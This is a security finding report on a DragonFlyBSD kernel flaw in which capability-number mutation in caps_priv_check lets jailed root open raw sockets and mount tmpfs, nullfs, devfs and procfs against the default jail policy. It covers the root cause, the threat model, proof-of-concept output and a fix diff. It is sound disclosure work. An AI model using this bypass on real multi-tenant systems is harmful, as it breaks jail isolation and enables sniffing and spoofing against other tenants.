# DF-0165: caps_priv_check cap-corruption -> jail policy bypass

## Verdict: **REPRODUCED** (5 distinct cap-gated actions bypass jail policy)

Inside a jail created with the **default restrictive policy** (`allow_raw_sockets=0`, `vfs_mount_{nullfs,tmpfs,devfs,procfs}=0`), a jailed root (uid 0) successfully:

1. opens a raw IPv4 socket (`socket(AF_INET, SOCK_RAW, IPPROTO_RAW)`): `SYSCAP_NONET_RAW`
2. mounts **tmpfs**: `SYSCAP_NOMOUNT_TMPFS`
3. mounts **nullfs**: `SYSCAP_NOMOUNT_NULLFS` (using kernel fstype "null")
4. mounts **devfs**: `SYSCAP_NOMOUNT_DEVFS`
5. mounts **procfs**: `SYSCAP_NOMOUNT_PROCFS`

On a fixed kernel, each of these returns `EPERM` because the per-capability jail policy flag is clear. On this build they all succeed, proving the bypass.

## Mechanism (root cause confirmed line-by-line)

In `sys/kern/kern_caps.c:333-340`:

```c
    res = caps_check_cred(cred, cap);                               /* :333 */
    if (cap & __SYSCAP_GROUP_MASK) {                                /* :334 */
        cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;  /* :335 -- MUTATES cap */
        res |= caps_check_cred(cred, cap);                          /* :336 */
    }
    if (res & __SYSCAP_SELF)
        return EPERM;
    return (prison_priv_check(cred, cap));                          /* :340 -- passes MUTATED cap */
```

For a per-capability value like `SYSCAP_NONET_RAW = __SYSCAP_GROUP_6 | 1 = 0x61`:

- `:334` `cap & __SYSCAP_GROUP_MASK` = `0x61 & 0xF0` = `0x60` (truthy)
- `:335` `cap = (0x61 & 0xF0) >> 4` = `0x6` (= `SYSCAP_NONET`, the **group master**)
- `:340` `prison_priv_check(cred, 0x6)`: the **specific cap (0x61) is never sent**

In `prison_priv_check` (`sys/kern/kern_jail.c:854-978`):

```c
    case SYSCAP_NONET:          /* :865-866 group master: ALLOWED */
        return 0;
    ...
    case SYSCAP_NOMOUNT:        /* :872,878 group master: ALLOWED */
        return 0;
    ...
    case SYSCAP_NONET_RAW:      /* :919-927 per-capability check -- DEAD on this path */
        if (PRISON_CAP_ISSET(pr->pr_caps, PRISON_CAP_NET_RAW_SOCKETS))
            return 0;
        return EPERM;
```

The `case SYSCAP_NONET_RAW` and the `case SYSCAP_NOMOUNT_*` branches are **dead code on the `caps_priv_check()` path**: `prison_priv_check` always receives the group-master number and matches the unconditional `return 0` case, so the per-capability PRISON_CAP_* flag is never consulted.

## Encoding reference (`sys/sys/caps.h`)

```
__SYSCAP_GROUP_MASK  = 0x000000F0  (bits 4..7)
__SYSCAP_GROUP_SHIFT = 4
__SYSCAP_XFLAGS      = 0x7FFF0000  (e.g. __SYSCAP_NULLCRED, NOROOTTEST)

Group-0 master caps (these match the "ALLOWED in jail" cases):
  SYSCAP_NONET   = 0x06 -> prison_priv_check returns 0 (allowed)
  SYSCAP_NOMOUNT = 0x0A -> prison_priv_check returns 0 (allowed)

Per-capability values (their *specific* switch arms are the real policy):
  SYSCAP_NONET_RAW      = 0x61 -> corrupted to 0x6 -> matches SYSCAP_NONET
  SYSCAP_NOMOUNT_NULLFS = 0xA0 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
  SYSCAP_NOMOUNT_DEVFS  = 0xA1 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
  SYSCAP_NOMOUNT_TMPFS  = 0xA2 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
  SYSCAP_NOMOUNT_FUSE   = 0xA4 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
  SYSCAP_NOMOUNT_PROCFS = 0xA5 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
```

## Caller chain (where the bypass matters)

- `sys/netinet/raw_ip.c:473`: `rip_attach` calls `caps_priv_check(ai->p_ucred, SYSCAP_NONET_RAW | __SYSCAP_NULLCRED)`. With `cap = 0x00020061`, the corruption still reduces it to `6`: `0x00020061 & 0xF0 = 0x60`, `>> 4 = 6`.
- `sys/kern/vfs_syscalls.c:152-157`: `sys_mount` calls `caps_priv_check_td(td, priv)` where `priv = get_fscap(fstypename)`. `get_fscap()` returns the specific `SYSCAP_NOMOUNT_*` value, which is corrupted to `SYSCAP_NOMOUNT`.

## Threat model

- **Attacker position**: jailed root (uid 0 inside a jail).
- **What the attacker gets**:
  - **Raw IP sockets** despite `jail.defaults.allow_raw_sockets=0`. Enables packet sniffing, IP-spoofed packet injection, ICMP attacks against other tenants / host.
  - **Mount nullfs / tmpfs / devfs / procfs** inside the jail despite `jail.defaults.vfs_mount_*=0`. Mounting devfs exposes device nodes; mounting nullfs over a host-visible path bypasses filesystem-level isolation; mounting procfs exposes host process metadata.
- **Preconditions**: default DragonFlyBSD jail (no special config required).
- **Reachability**: trivial, via `socket(AF_INET, SOCK_RAW, IPPROTO_RAW)` and `mount("tmpfs", target, 0, NULL)` from jailed root.

## Demonstration

```
---- jail default policy (should all be 0): ----
jail.defaults.allow_raw_sockets: 0
jail.defaults.vfs_mount_nullfs: 0
jail.defaults.vfs_mount_tmpfs: 0
jail.defaults.vfs_mount_devfs: 0
jail.defaults.vfs_mount_procfs: 0
---- running bypass as root (will create + enter jail): ----
jail() ok: jid=11 (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
(jail default policy: allow_raw_sockets=0, vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
socket(AF_INET, SOCK_RAW, IPPROTO_RAW) [SYSCAP_NONET_RAW] -> OK fd=3 *** BYPASS ***
mount("tmpfs", /tmp/df0165-mnt-tmpfs) [SYSCAP_NOMOUNT_TMPFS] -> OK *** BYPASS ***
mount("null", /tmp/df0165-mnt-nullfs) [SYSCAP_NOMOUNT_NULLFS] -> OK *** BYPASS ***
mount("devfs", /tmp/df0165-mnt-devfs) [SYSCAP_NOMOUNT_DEVFS] -> OK *** BYPASS ***
mount("procfs", /tmp/df0165-mnt-procfs) [SYSCAP_NOMOUNT_PROCFS] -> OK *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
```

Reproduced 3 times in a row (see `run.log`, `run.2.log`, `run.3.log`); every run yields the same 5 bypasses. The only inter-run difference is the `jid=` value, which is just an incrementing jail counter.

## Notes / minor adjacent issues (not part of DF-0165)

1. `get_fscap()` in `sys/kern/vfs_syscalls.c:5386` matches `strncmp("null", fsname, 5)`, which does NOT match the user-visible fstype `"nullfs"`. The kernel fstype for nullfs is `"null"` (its vfsconf `vfc_name`). Anyone calling `mount("nullfs", ...)` falls through to the `SYSCAP_RESTRICTEDROOT` default, a separate latent surprise that the PoC works around by using `"null"`.
2. The same corruption affects `SYSCAP_NONET_BT_RAW`, `SYSCAP_NONET_ROUTE`, `SYSCAP_NONET_IFCONFIG`, etc., but those callers either route through a different cap or the action is independently gated. The five actions demonstrated here are the directly observable wins.

## Recommended fix (matches the finding's diff)

Don't mutate the `cap` variable used for the jail lookup. Use a separate local for the group-master test:

```diff
--- a/sys/kern/kern_caps.c
+++ b/sys/kern/kern_caps.c
@@ -331,9 +331,10 @@
     res = caps_check_cred(cred, cap);
     if (cap & __SYSCAP_GROUP_MASK) {
-        cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
-        res |= caps_check_cred(cred, cap);
+        int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
+        res |= caps_check_cred(cred, gcap);
     }
     if (res & __SYSCAP_SELF)
         return EPERM;
-    return (prison_priv_check(cred, cap));
+    return (prison_priv_check(cred, cap)); /* ORIGINAL specific cap */
 }
```

After the fix, the PoC should output `EPERM` for every action (policy honored).